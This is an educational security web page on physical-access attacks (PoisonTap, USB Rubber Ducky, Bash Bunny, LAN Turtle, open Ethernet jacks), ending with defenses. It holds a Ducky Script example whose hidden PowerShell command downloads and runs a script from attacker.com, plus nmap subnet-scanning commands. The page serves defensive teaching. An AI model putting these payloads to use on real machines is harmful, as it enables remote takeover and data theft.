WiFi Attack

Physical WiFi Security Attacks

Physical access to a device or network jack opens attack vectors that bypass all WiFi-specific defenses. USB gadgets, Ethernet jacks, and hardware implants can compromise systems faster than any wireless attack — sometimes in seconds.

Medium Threat Intermediate

Updated April 2026

3 min read

MalwareZero Research Team Updated April 2026

id="poisontap">PoisonTap

PoisonTap (by Samy Kamkar, 2016) exploits USB and Ethernet interfaces by emulating an Ethernet adapter over USB. When plugged into a locked computer, it:

Hijacks all outbound network traffic (even over WiFi if connected)
Exposes the router's internal DNS cache and poisoning it
Installs a persistent backdoor via WebSocket APIs in browsers
Captures cookies and authentication tokens

Total time to deploy: plug in for 60 seconds. Cost: $0 (uses a Raspberry Pi Zero — or just a USB cable with modified firmware on some devices).

# PoisonTap attack sequence (conceptual):

# Attacker plugs PoisonTap into locked computer

# Computer sees it as Ethernet over USB

# PoisonTap sends DHCP requests, claiming to be a gateway

# Computer updates its routing table — all traffic now goes through PoisonTap

# PoisonTap:

#   - Dumps all cookie/session data from browser cache

#   - Plants persistent backdoor in browser's localStorage

#   - Exfiltrates data to attacker server

#   - Returns computer to normal state

# Attacker unplugs. Backdoor remains.

Why PoisonTap Works on Locked Machines

Most operating systems treat USB Ethernet adapters as trusted peripherals. When a new network interface appears, the OS automatically uses it. A locked screen doesn't prevent network interface initialization. PoisonTap doesn't bypass the lock — it just adds a new network path that the computer uses before the user logs in.

Rubber Ducky / Keystroke Injection

The USB Rubber Ducky is a USB device that looks like a normal flash drive but types at superhuman speed — emulating a keyboard. When plugged in, it executes a pre-programmed keystroke sequence that can run commands, download malware, or exfiltrate data in seconds.

Feature	Rubber Ducky	Native OS Keyboard
Speed	~1000 characters/second	~5-10 characters/second
Detection by AV	Very hard (it's a keyboard)	N/A
Requires admin	Sometimes (Bypass-UCAMDtechnique)	N/A
Physical form	Looks like flash drive	N/A

$ # Ducky Script example (reverse shell payload)

REM Open PowerShell and download/execute Meterpreter

DELAY 1000

GUI r

DELAY 500

STRING powershell -windowstyle hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"

ENTER

Bash Bunny

The Bash Bunny (by Hak5) is an advanced USB attack platform — essentially a mini Linux computer in a USB form factor. It can switch between keyboard emulation ( Rubber Ducky mode) and mass storage mode, and run full Linux payloads for complex attacks including network bridging, credential harvesting, and payload delivery.

LAN Turtle

The LAN Turtle is a small Linux computer that plugs into an Ethernet port and provides stealthy remote access. It performs:

USB Ethernet emulation: Appears as a normal network adapter
SSH tunnel: Creates an outbound connection to attacker server
Man-in-the-middle: Sits between the victim machine and the real network
Module system: Downloadable modules for various attacks (packet capture, keylogger, etc.)

Cost: ~$60. Physical size: fits in a jacket pocket. Can be left in place for months — it's powered by PoE (Power over Ethernet) or draws power from the Ethernet connection itself.

Ethernet Jack Attacks

Physical access to an Ethernet jack provides direct access to the local network, bypassing all WiFi encryption. In many office buildings, Ethernet jacks in conference rooms, hallways, and guest areas are not properly network-segmented.

$ # Attacker plugs into open Ethernet jack

$ # Gets DHCP IP from corporate network



$ # Immediate recon

$ nmap -sn 192.168.1.0/24  # Scan entire subnet

$ nmap -sV -O 192.168.1.1   # Identify router



# Now on the internal network — no WPA2 to break

# Full visibility into all internal traffic

Defense Against Physical Access Attacks

Disable unused USB ports: BIOS/UEFI settings can disable USB entirely or require authentication
USB port blocking: Physical USB port locks or soldered ports on sensitive machines
USBguard (Linux): Kernel-level USB device whitelisting
Endpoint detection and response (EDR): Modern EDR can detect keystroke injection patterns
Network access control (NAC): 802.1X authentication prevents unauthorized Ethernet devices from joining the network
Network segmentation: Guest and office VLANs, even for physical ports
Full-disk encryption: Doesn't prevent PoisonTap but limits damage if device is stolen
Locked screens + BIOS passwords: Makes it harder to use a physical device on your machine

← PreviousNetwork Infiltration Attacks Next →WiFi Supply Chain Attacks

Understand the Threat. Build the Defense.

Learn how to protect yourself and your organization against Physical Attacks attacks.

View Defense Guide All Attacks